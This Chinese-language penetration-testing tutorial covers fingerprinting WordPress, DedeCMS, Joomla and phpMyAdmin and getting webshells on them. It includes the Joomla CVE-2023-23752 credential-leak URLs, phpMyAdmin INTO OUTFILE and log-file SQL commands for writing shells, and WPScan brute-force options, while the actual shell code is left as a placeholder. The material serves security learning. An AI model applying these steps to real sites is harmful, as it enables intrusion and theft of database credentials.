当前位置: 首页 > article >正文

4.3_CMS漏洞

article 2024/12/3 2:25:48

  • CMS

  1. CMS:内容管理系统;

  2. 常见CMS:

    1. 国内:DedeCMS(织梦CMS)PHPCMS74CMS
    2. 国外:WordpressJoomlaDrupal

  3. CMS漏洞利用方式:识别CMS --> 寻找Nday --> 漏洞检测 --> 漏洞利用;

  4. 内容总述

    CMS漏洞

    WordPress
    1. 后台编辑模板GetShell;
    2. 上传恶意主题GetShell;

    DedeCMS
    1. 后台修改模板Getshell;
    2. DedeCMS V5.7 SP2 后台代码执行漏洞;

    Joomla
    1. 未授权访问敏感信息泄露 (CVE-2023-23752);

    phpMyadmin

    (并非CMS,但有用)
    1. 写入文件GetShell;
    2. 写入数据表GetShell;
    3. 全局日志GetShell;
    4. 慢查询日志GetShell;

  • WordPress

识别方式
  1. 默认ICON图标(W图标);
  2. 默认路径中包含wp-* ;例:wp-content , wp-admin ,wp-includes
  3. robots.txt 文件中包含特殊规则:Disallow: /wp-*/,例:Disallow: /wp-admin/ ;
  4. 工具(在线网站 + 工具WPScan(kali自带),Goby,Wappalyzer);
    1. Check web technologies used by a website - Site Info
    2. TideFinger 潮汐指纹 TideFinger 潮汐指纹 (tidesec.com)
  5. HTTP头包含版本号 或 generator,例:WordPress 5.4.2
GetShell 方式
后台编辑模板GetShell
  1. 登录后台 --> 外观 --> 编辑 --> 写入恶 意代码;

  2. 访问,拼接路径 /wp-content/themes/twentyfifteen/404.php  ;
  3. 其中 twentyfifteen 为 上图页面中 theme 参数的值;
上传恶意主题GetShell
  1. 下载主题后将木马添加进去,重新压缩为zip文件;
    1. 网上免费的很多,我这里随便贴2个网站
    2. WordPress主题_爱主题
    3. wordpress免费主题|wordpress企业主题|wordpress cms主题|wordpress网站模板|wordpress模板-WEB主题公园
  2. 网站添加包含木马的主题

  3. 访问,拼接路径 /wp-content/themes/iconic-one/abc.php
  4. PS:iconic-one 为主题文件名,abc.php 为恶意文件;
WPScan工具利用(kali自 带)
  1. 默认扫描: --url ; 例: wpscan --url http://xxxxxxx/
  2. 指定用户枚举: --enumerate u ;例: wpscan --url http://xxxxxxx/ --enumerate u
  3. 爆破用户密码: -e u --wordlist 字典文件路径
  4. 扫描插件漏洞: --enumerate vp
  5. 主题扫描: --enumerate t
  6. 额外参数token: --api-token B4GxuWinKvshoHJ2Kxxx

  • DedeCMS

识别方式
  1. 默认ICON图标(DEDECMS);
  2. 默认路径中包含/plus/,如/plus/feedback.php/plus/mytag.php等;
  3. robots.txt 文件中包含特殊规则:Disallow: /plus/feedback_js.php
  4. 工具识别(在线网站 + 工具Goby,Wappalyzer);
    1. Check web technologies used by a website - Site Info
    2. TideFinger 潮汐指纹 TideFinger 潮汐指纹 (tidesec.com)
  5. 后台登录界面通常为 /dede//admin_do.php
  6. 通常版本信息在 /data/admin/ver.txt 中,例:返回20210521,表示版本为2021年5月21日;
GetShell 方式
修改模板文件拿Getshell
  1. 模板(下) --> 默认模板管理--> index.html --> 修改;

  2. 添加恶意语句
  3. 生成 --> 更新主页HTML --> 修改 html为php --> 生成静态 --> 更新主页HTML -->浏览

  4. 蚁剑连接
DedeCMS V5.7 SP2后台代码执行漏洞
  1. 模块(上)--> 辅助插件 --> 广告管理 --> 增加广告 --> 广告内容写入恶意代码 --> 确定

  2. 得到文件路径,URL拼接

  3. 蚁剑连接

  • Joomla 

识别方式
  1. 默认ICON图标(四色J连接的图形);
  2. 默认路径中包含 /administrator/
  3. robots.txt 文件中包含特殊规则:如 Disallow: /administrator/
  4. 工具识别(在线网站 + 工具 joomscanGobyWappalyzer);
    1. Check web technologies used by a website - Site Info
    2. TideFinger 潮汐指纹 TideFinger 潮汐指纹 (tidesec.com)
  5. 通常版本信息默认路径在:/modules/mod_login/mod_login.xml
影响范围4.0.0 ≤ Joomla ≤ 4.2.7
FOFA语句icon_hash="1627330242"

利用方式

未授权访问敏感信息泄露 (CVE-2023-23752)
  1. 拼接POC即可获取敏感信息(如数据库的账号密码)
  2. /api/index.php/v1/config/application?public=true
  3. /api/v1/config/application?public=true
joomscan 工具安装及使用

  1. 安装:

    sudo apt update 
sudo apt install joomscan

  2. 使用:

    joomscan --url http://example.com

  • PHPMyadmin(并非CMS,但有用)

识别方式
  1.  默认ICON图标(phpMyAdmin);
  2. 默认路径中多包含  /phpmyadmin/
  3. robots.txt 文件中包含特殊规则:如 Disallow: /phpmyadmin/Disallow: / ,Disallow: /libraries/
  4. 工具识别(GobyWappalyzer);
  5. 配置信息存储在 /usr/share/phpmyadmin/Config.php 或 /usr/share/phpmyadmin/package.json;(少,了解一下)
条件
  1. 必须是高权限用户;
  2. 知道网站的绝对路径;
  3. secure_file_priv='' ;

GetShell方式
写入文件 GetShell
  1. 查询 secure_file_priv 状态命令:SHOW GLOBAL VARIABLES LIKE '%secure_file_priv%' 
  2. 写入 恶意代码:select '恶意语句' into outfile 'D:/\phpStudy/\PHPTutorial/\WWW/\3.php'
  3. URL访问写入的恶意文件
写入数据表GetShell
  1. 找任意表的字段写入恶意代码(注意字段长度足够)INSERT INTO `message`(`title`) VALUES ('恶意语句')
  2. 查询该数据表写入任意php文件中:SELECT * FROM `message` into outfile 'D:/\phpStudy/\PHPTutorial/\WWW/\4.php'
  3. URL访问写入的恶意文件
全局日志 GetShell
  1. 开启全局日志记录(不影响原日志)   SET global general_log = "ON";
  2. 将日志文件记录到指定的文件   SET global general_log_file ='D:/\phpStudy/\PHPTutorial/\WWW/\RIZHITTS.php';
  3. 请求一下,写入日志   SELECT '恶意语句' 
  4. URL访问带有恶意代码的日志
慢查询日志 GetShell
  1. 查看日志开启情况    show variables like '%slow_query_log%';
  2. 开启慢查询日志    set global slow_query_log=1;
  3. 将日志文件记录到指定的文件   SET global general_log_file ='D:/\phpStudy/\PHPTutorial/\WWW/\5.php';
  4. 查询写入慢日志的最低时限(默认10)      show global variables like '%long_query_time%';
  5. 向日志写入恶意代码(>最低时限)     SELECT '恶意语句' or sleep(11);  

  • 识别方式对比

WordPressDedeCMSJoomlaPHPMyadmin
默认ICON图标

(W图标)

DEDECMS

(四色J连接的图形)

phpMyAdmin

默认路径

包含wp-* ;例:wp-content , wp-admin ,wp-includes

包含/plus/,如/plus/feedback.php/plus/mytag.php等;

包含 /administrator/

包含  /phpmyadmin/

robots.txt 文件中包含特殊规则

Disallow: /wp-*/,例:Disallow: /wp-admin/ ;

Disallow: /plus/feedback_js.php

Disallow: /administrator/

Disallow: /phpmyadmin/Disallow: / ,Disallow: /libraries/

工具识别

工具(在线网站 + 工具WPScan(kali自带),Goby,Wappalyzer);

    1. Check web technologies used by a website - Site Info
    2. TideFinger 潮汐指纹 TideFinger 潮汐指纹 (tidesec.com)

工具识别(在线网站 + 工具Goby,Wappalyzer);

    1. Check web technologies used by a website - Site Info
    2. TideFinger 潮汐指纹 TideFinger 潮汐指纹 (tidesec.com)

工具识别(在线网站 + 工具 joomscanGobyWappalyzer);

    1. Check web technologies used by a website - Site Info
    2. TideFinger 潮汐指纹 TideFinger 潮汐指纹 (tidesec.com)

工具识别(GobyWappalyzer);

其他

HTTP头包含版本号 或 generator,例:WordPress 5.4.2

后台登录界面通常为 /dede//admin_do.php

通常版本信息在 /data/admin/ver.txt 中,例:返回20210521,表示版本为2021年5月21日;

通常版本信息默认路径在:/modules/mod_login/mod_login.xml

配置信息存储在 /usr/share/phpmyadmin/Config.php 或 /usr/share/phpmyadmin/package.json;(少,了解一下)

  • 扩展 — 推荐文章

  1. CMS 漏洞 + POC 集合:  GitHub - SecWiki/CMS-Hunter: CMS漏洞测试用例集合
  2. WordPress,DedeCMS,ASPCMS,Pageamin,PHPMyadmin(少,相对精):【复现】常见CMS漏洞_cms漏洞复现-CSDN博客

  • 免责声明

  1. 本专栏内容仅供参考,不构成任何投资、学习或专业建议。读者在参考本专栏内容时,应结合自身实际情况,谨慎作出决策。

  2. 本专栏作者及发布平台尽力确保内容的准确性和可靠性,但无法保证内容的绝对正确。对于因使用本专栏内容而导致的任何损失,作者及发布平台概不负责。

  3. 本专栏部分内容来源于网络,版权归原作者所有。如有侵权,请及时联系我们,我们将尽快予以处理。

  4. 读者在阅读本专栏内容时,应遵守相关法律法规,不得将内容用于非法用途。如因读者行为导致不良后果,作者及发布平台不承担任何责任。

  5. 本免责声明适用于本专栏所有内容,包括文字、图片、音频、视频等。读者在阅读本专栏内容时,视为已接受本免责声明。

  6. 作者及发布平台保留对本免责声明的解释权和修改权,如有变更,将第一时间在本专栏页面进行公告。读者继续使用本专栏内容,视为已同意变更后的免责声明。

敬请广大读者谅解。如有疑问,请联系我们。谢谢!


http://www.kler.cn/a/419275.html

相关文章:

  • 深入解析 Kubernetes 节点操作:Cordon、Uncordon 和 Drain 的使用与最佳实践
  • 如何看linux系统内核是aarch64 ,还是64-bit
  • 使用OSPF配置不同进程的中小型网络
  • 2411rust,1.83
  • 4.5-Channel 和 Flow:SharedFlow 和 StateFlow
  • 华为机试HJ77 火车进站
  • 区块链学习笔记(2)--区块链的交易模型part1
  • 每日速记10道java面试题04
  • transformer学习笔记-词嵌入embedding原理
  • Y20030012基于php+mysql的药店药品信息管理系统的设计与实现 源码 配置 文档
  • ECharts柱状图-极坐标系下的堆叠柱状图,附视频讲解与代码下载
  • 基于Java实现的潜艇大战游戏
  • 数据集搜集器(百科)008
  • 容器化与 Kubernetes:现代应用的编排与管理
  • LwIP协议栈 基础知识介绍
  • 电商项目高级篇06-缓存
  • 前端将echarts的图和element表格 一起导出到excel中
  • el-tree的使用及控制全选、反选、获取选中
  • 韩顺平 一周学会Linux | Linux 实操篇-组管理和权限管理
  • 根据后台数据结构,构建搜索目录树
  • openssl 基本命令使用方法
  • Oracle之提高PLSQL的执行性能
  • 三十二:网络爬虫的工作原理与应对方式
  • ASP网络安全讲述
  • 易速鲜花聊天客服机器人的开发(上)
  • 一体化数据安全平台uDSP 入选【年度创新安全产品 TOP10】榜单